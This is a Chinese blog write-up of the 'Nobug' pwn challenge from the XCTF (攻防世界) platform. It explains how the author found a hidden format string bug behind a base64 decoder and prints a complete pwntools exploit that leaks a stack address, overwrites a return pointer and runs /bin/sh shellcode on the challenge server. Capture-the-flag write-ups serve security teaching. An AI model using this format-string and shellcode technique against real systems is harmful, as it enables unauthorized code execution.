攻防世界PWN之Nobug题解

最新推荐文章于 2023-06-15 10:07:12 发布
最新推荐文章于 2023-06-15 10:07:12 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103630886
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Nobug

首先,检查一下程序的保护机制

PIE和NX没开,那么,我们可以轻松的布置shellcode到栈里或bss段或堆里,然后跳转。免去了泄露libc地址这些。

然后,我们用IDA分析一下

看似好像这里sprintf不存在漏洞,我们再看看其他函数

看见一个很复杂的函数,我们看看那个地址处是什么

是查表法,看起来像某种加密或解密算法,又由于不需要秘钥,我们推测可能是base64加密或解密,然后,我们测试一下。

我们输入明文,输出总是乱码,我们输入base64字符串,发现正常输出了解密后的内容,由此,我们知道了,这个函数的作用是解密base64字符串。

 

然后,我们继续找找,也没发现什么可疑的地方。再看看其他没有用到的函数

发现这里有一个格式化字符串漏洞的函数,但是似乎这个函数没有被调用,真的是这样吗?

对于sub_8048B76函数,IDA查看伪代码是这样的

我们再看看汇编代码

程序结尾,通过修改esp,决定了retn的返回地址,这类似于ROP技术的思想,由此看来,分析程序不能完全依靠IDA的为代码

分析完了,其实就是存在一个非栈上的格式化字符串漏洞。

我们通过%4$hhn来修改%12$处的数据为%13$的地址,然后通过%12$hhn来修改%13$处为shellcode的地址,然后就能getshell了。我们只需要覆盖低2字节就行了,因为前面是一样的。需要注意的是,这几个操作必须在一次完成。

我们需要泄露%4$处的数据,以计算出我们需要攻击的目标%13$的地址

  1. payload = base64.b64encode('%4$p')  
  2. sh.sendline(payload)  
  3. sh.recvuntil('0x')  
  4. #泄露我们需要修改的目标的地址  
  5. target_addr = int(sh.recvuntil('\n',drop = True),16) + 4  

接下来,就是一次性的修改,getshell。

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3. import base64  
  4.   
  5. sh = remote('111.198.29.45',31218)  
  6. #sh = process('./pwnh40')  
  7. elf = ELF('./pwnh40')  
  8. #我们输入的shellcode解密后会被保存到这里  
  9. shellcode_addr = 0x804A0A0  
  10. #shellcode  
  11. shellcode = asm(shellcraft.i386.sh())  
  12.   
  13. payload = base64.b64encode('%4$p')  
  14. sh.sendline(payload)  
  15. sh.recvuntil('0x')  
  16. #泄露我们需要修改的目标的地址  
  17. target_addr = int(sh.recvuntil('\n',drop = True),16) + 4  
  18. print hex(target_addr)  
  19. #发送shellcode,同时,覆盖%12$处为target地址,同时将target处修改为shellcode_addr  
  20. payload = base64.b64encode(shellcode + '%' + str((target_addr & 0xFF) - len(shellcode)) + 'c%4$hhn%' + str((shellcode_addr & 0xFF) - (target_addr & 0xFF)) + 'c%12$hn')  
  21. #getshell  
  22. sh.sendline(payload)  
  23.   
  24. sh.interactive()  

本题告诉我们,分析程序时,不要完全依赖IDA的伪代码。同时,对于一些复杂的算法,可以推测并尝试一下,说不定就是呢。

ha1vk
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
秒懂,Java 注解 (Annotation)你可以这样学
frank 的专栏
06-27 27万+
文章开头先引入一处图片。 这处图片引自老罗的博客。为了避免不必要的麻烦,首先声明我个人比较尊敬老罗的。至于为什么放这张图,自然是为本篇博文服务,接下来我自会说明。好了,可以开始今天的博文了。 Annotation 中文译过来就是注解、标释的意思,在 Java 中注解是一个很重要的知识点,但经常还是有点让新手不容易理解。 我个人认为,比较糟糕的技术文档主要特征之一就是:用专业名词来...
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2089
BugkuCTF pwn题第一弹
攻防世界----bug
qq_44418229的博客
08-03 955
攻防世界----bug 知识点1:逻辑漏洞--垂直越权 知识点2:文件上传---利用JavaScript执行php代码
【愚公系列】2023年06月 攻防世界-Web(bug
时光隧道
06-15 4387
越权渗透是指黑客利用系统漏洞或者密码破解等手段,未经授权地进入目标系统获得权限。具体而言,越权渗透可以包括以下几种形式:弱口令攻击:黑客通过暴力破解或者社工攻击等手段获取系统账号和密码,从而进入目标系统。缓冲区溢出攻击:黑客利用系统中存在的缓冲区溢出漏洞,向目标系统注入恶意代码,从而获得系统权限。SQL注入攻击:黑客利用目标系统中存在的SQL注入漏洞,通过注入恶意SQL语句获取系统权限。基本流程案例如下:收集信息:黑客先通过信息搜集技术,获取目标系统的基本信息,包括IP地址、端口、服务等。
攻防世界-WEB进阶区-bug
qq_64966153的博客
07-04 1056
攻防世界 bug靶场
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3688
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
攻防世界WEB】难度五星15分进阶题:bug
07-23 438
攻防世界WEB】五星15分
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
攻防世界-web-bug-从0到1的解题历程writeup
CTF小白的博客
04-15 2157
题目分析 拿到题目首先注册了一下admin账号发现账号存在。然后后登陆后发现Manage需要admin权限,那么大概就是要获取到admin账号或者admin权限了。 尝试了一下发现 先输入自己注册的正确账号令其跳转到修改密码界面,然后修改username直接找回admin的密码即可 成功登陆admin账号 发现进入admin模块提示IP NOT allowed。 尝试修改IP添加请求头X-...
攻防世界 re新手题
Nobug_的博客
02-07 240
simple-unpack 因为题目说是有壳子的 所以用PE分析: 1.64位文件 2.upx加壳 shift+f12 查找字符串即可 Hello, CTF 还是先分析 似乎并没有什么用 知识发现32位C++ 在IDA里面f5反编译,发现有一段字符 13对应的字串是16进制 用前几天学的pyhton知识 可以转换过来 s=bytes.fromhex("437261636b4d654a757374466f7246756e") print(s) CrackMeJustForFun over!
[XCTF-pwn] 33_rctf-2015_nobug
weixin_52640415的博客
03-10 383
格式化字符串漏洞 snprintf 程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。 int sub_8048B76() { size_t v0; // eax const char *v1; // eax v0 = strlen(s); v1 = (const char *)sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, "%s", v1); } 思路:
攻防世界(pwn)Noleak
PLpa的博客
03-03 1479
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
佛祖保佑代码无bug图片_我发现了个Python黑魔法,执行任意代码都会自动念上一段「平安经」...
weixin_39634351的博客
01-02 496
优质文章,第一时间送达!来源 | Python编程时光最近的"平安经"可谓是引起了不小的风波啊。作为一个正儿八经的程序员,最害怕的就是自己的代码上线出现各种各样的 BUG。为此,今天分享一个 Python 的黑魔法,教你如何在你执行任意 Python 代码前,让 Python 解释器自动念上一段平安经,保佑代码不出 BUG 。做好心理准备了嘛?马上要开始作妖了,噢不,是开始念经了。感谢佛祖保佑,E...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
基于GEC6818五子棋游戏GEC6818_Gomoku.zip
最新发布
05-12
五子棋游戏想必大家都非常熟悉,游戏规则十分简单。游戏开始后,玩家在游戏设置中选择人机对战,则系统执黑棋,玩家自己执白棋。双方轮流下一棋,先将横、竖或斜线的5个或5个以上同色棋子连成不间断的一排者为胜。 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【技术】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值